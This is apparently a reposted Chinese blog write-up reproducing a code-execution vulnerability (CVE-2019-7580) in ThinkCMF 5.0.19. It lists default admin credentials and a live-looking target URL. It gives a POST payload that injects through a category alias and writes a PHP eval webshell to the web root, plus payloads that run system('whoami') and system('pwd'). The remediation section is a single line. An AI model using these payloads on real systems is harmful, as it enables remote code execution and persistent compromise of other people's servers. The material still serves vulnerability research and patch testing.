thinkcmf 代码执行 (CVE-2019-7580) 漏洞复现-爱代码爱编程
所有文章,仅供安全研究与学习之用,后果自负!
thinkcmf 代码执行 CVE-2019-7580
thinkcmf 代码执行 (CVE-2019-7580)
复现小心会搞崩环境。
0x01 漏洞描述
ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPHP开发. thinkcmf 5.0.19 这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞。
这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞.
将payload插入数据库,写入data/conf/route.php文件
程序的入口是index.php,在index.php中\think\App::run()执行应用。
在App.php的run()函数139行,执行sef::exec();
0x02 影响范围
5.0.190111
0x03 漏洞复现
3.1 登录后台
admin 123456
/user/login/index.html
3.2 漏洞利用
3.2.1webshell
url:
http://118.193.36.37:34311/portal/admin_category/addpost.html
post 请求包:
parent_id=0&name=111&alias=1'=>array(""),file_put_contents('/var/www/html/public/shell.php','<?php eval($_POST[cmd]);?>'),'2
在根目录shell生成 文件 连接
3.2 phpinfo
/admin/index/index.html#/portal/admin_category/index.html
门户管理-》分类管理-》添加分类-》
3.3 获取系统命令
1’=>array(“”),system(‘whoami’),‘2
1’=>array(“”),system(‘pwd’),'2
0x04 漏洞修复
升级版本